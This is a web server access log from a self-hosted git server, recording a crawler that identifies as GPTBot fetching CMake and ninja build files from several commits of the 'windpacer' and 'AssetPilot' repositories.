"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:57:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 12624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:57:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2f.venv%2finclude%2fsite%2fpython3.12%2fgreenlet" [Client 74.7.227.38] [Length 29205] [Gzip 6.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:15:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 10479] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:57:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" [Client 74.7.227.38] [Length 20008] [Gzip 15.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.ninja_deps" +[17/Feb/2026:15:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" [Client 74.7.227.38] [Length 505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.ninja_log" +[17/Feb/2026:15:57:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9970] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33678] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33675] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10812] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10315] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9989] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43111] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9995] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43113] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9971] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33679] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33680] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:15:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43115] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10811] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10814] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:15:57:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:15:57:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43112] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 43114] [Gzip 19.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 9990] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:15:57:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 28457] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 